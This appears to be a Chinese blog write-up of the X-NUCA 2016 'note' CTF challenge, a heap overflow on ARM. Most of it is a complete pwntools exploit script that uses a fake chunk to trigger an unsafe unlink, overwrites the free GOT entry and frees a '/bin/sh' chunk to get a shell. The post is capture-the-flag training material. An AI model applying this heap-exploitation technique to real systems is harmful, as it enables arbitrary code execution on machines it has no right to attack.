arm_double_free_attack

题目来源自 X-NUCA 2016的note题目。题目资料全都可以从我的github上下载。

简单的堆溢出题目,但是环境在arm上,有一些小坑,比如说0x200的chunk在这边行不通了,只能用0x100的chunk,0x200好像比变成了large chunk,果然基础弱渣在这里是无法生存的。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-04-09 08:34:41
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
# import roputils
from pwn import *
context(log_level="debug")
DEBUG = 1
target = "./note"
remote_ip = ""
port = 0
# rop = roputils.ROP(target)
# bss = rop.section('.bss')
# rop.got('puts')
# msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x0b\x0d\x0a'
if DEBUG:
p = process(target)
# gdb.attach(p,"b*main\nc")
else:
p = remote(remote_ip,port)
def sl(data):
p.sendline(data)
def sd(data):
p.send(data)
def ru(data):
return p.recvuntil(data)
def add(length,data):
ru("6. Exit")
sl("1")
# raw_input()
ru("\n")
sl(str(length))
ru("\n")
sl(data)
def dele(index):
ru("6. Exit")
sl("2")
ru("the id:")
sl(str(index))
def edit(index,data):
ru("6. Exit")
sl("5")
ru("\n")
sl(str(index))
ru("\n")
sl(data)
def edit_anyaddr(addr,data):
edit(1,p32(0)+p32(addr))
edit(0,data)
# stage 1 unlink
add(0,"a"*0x8)#0
add(0x100,"aaa")#1 >=0x200会使用large chunk
add(0x100,"aaa")#2
add(0x100,"/bin/sh\x00")#3
junk = "\x00"*8
head = p32(0)*2
fake_head = p32(0)+p32(0x101)
fd = p32(0x1205C+0x8-0xc)
bk = p32(0x1205C+0x8-0x8)
payload = junk+head
payload += fake_head+fd+bk
payload += "a"*(0x100-len(fake_head+fd+bk))
payload += p32(0x100)+p32(0x108)
edit(0,payload)
raw_input()
dele(2)
# stage 2 edit free_got
edit_anyaddr(0x12024,p32(0x8538)[:-1])#有零字节溢出,会破坏下一个got
dele(3)
p.interactive()

×

你要赏我吃糖果吗?

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
,
隐藏